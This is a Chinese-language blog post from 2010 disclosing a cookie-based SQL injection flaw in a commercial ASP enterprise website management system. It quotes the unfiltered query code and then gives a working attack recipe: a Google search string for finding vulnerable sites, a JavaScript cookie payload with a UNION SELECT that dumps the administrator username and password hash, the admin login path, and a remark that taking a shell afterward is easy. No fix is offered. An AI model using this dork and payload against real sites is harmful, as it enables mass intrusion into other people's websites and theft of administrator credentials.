标题：良精企业网站管理系统漏洞
出处：大漠荒颜
时间：Sun, 31 Jan 2010 13:21:21 +0000
作者：北纬36度
地址：http://www.736202.com/read.php/165.htm

内容：
涉及版本：良精企业网站管理系统(2007-V09)官方正式商业版
其他版本未做测试 

文件：
EnProductShow.asp 

描述：
变量ID信任客户端提交值，带入sql语句查询，程序用了通用SQL防注入程序，详细见Check_Sql.asp。关键代码如下 


ID=trim(request("ID"))
if ID="" then
  response.Redirect("EnProduct.asp")
end if 


sql="select * from Product where ID=" & ID & "" '此处无过虑，注入点
Set rs= Server.CreateObject("ADODB.Recordset")
rs.open sql,conn,1,3
if rs.bof and rs.eof then
  response.write"alert('找不到此产品！');"
  response.write"javascript:history.go(-1)"
else  
  rs("Hits")=rs("Hits")+1
  rs.update 

Check_Sql.asp仅对GET和POST的数据进行了过滤，忽略了Cookie 
利用方法：
Google搜索关键字 inurl:"EnProductShow.asp?id="
cookie注入，支持union，Product表26个字段，演示如下 


1.http://www.Tr4c3.com/EnProductShow.asp?ID=229 

SYUE.COM


2.javascript:alert(document.cookie="id="+escape("229 union select 0,1,2,3,4,5,6,username,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from admin")) 


3.http://www.tr4c3.com/EnProductShow.asp 

即可union出管理员帐号，密码（md5值）
后台地址
/admin/login.asp
后台拿shell方法很多。略过 


Generated by Bo-blog 2.1.1 Release